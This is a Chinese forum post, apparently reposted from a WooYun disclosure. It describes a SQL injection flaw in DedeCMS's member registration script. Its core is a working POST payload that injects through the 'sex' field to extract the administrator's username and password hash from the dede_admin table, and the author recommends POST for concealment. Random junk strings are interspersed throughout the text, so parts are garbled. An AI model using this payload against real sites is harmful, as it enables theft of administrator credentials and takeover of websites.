找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞. @  K0 C" J) f9 I) N
简要描述:% }- w% I* q7 Q- y9 l9 ?

; _: D( R  ~- b/ w7 ~  Z需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
+ U, D  o8 O4 ]4 `- x+ v原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 U% _& b+ @  N% W/ \9 o
详细说明:跟这个漏洞
. e4 Z; o! H0 O0 O% h2 F   j. ^0 b0 V  z& u
WooYun: Dedecms SQL注射导致审核机制绕过漏洞  @& d% {7 r6 k' q) K8 `6 f3 e* r
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
$ T3 n* I( b: S1 E6 Z5 @9 w4 ePOST提交以下数据,其实不用POST提交的,这样隐蔽点.! {) b! v. M) h: R
5 v% t& i) J/ w$ J2 U  Q2 J7 q
www.political-security.com/member/reg_new.php
! V+ H1 A/ g- N) F5 Z2 G
+ `: i9 n( Y' x% @5 UPOST
0 B, l% }2 @. S5 T7 E, v: G
5 @- B: z% z6 h& [5 r" d. H1 x) hdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&" ?4 \0 Z( K! L  ^" `# ^  [4 D
userid=c4rp3nt3r&uname=c4rp3nt3r
6 A3 X+ |8 O" f, j) S&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
& s  {4 z) D; {! y: F& z' ]9 }/ T&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,1 M' P1 A/ a7 p6 G& }7 P5 f
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');! u* W; y0 ^9 J# K' N: f2 m" _# W
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表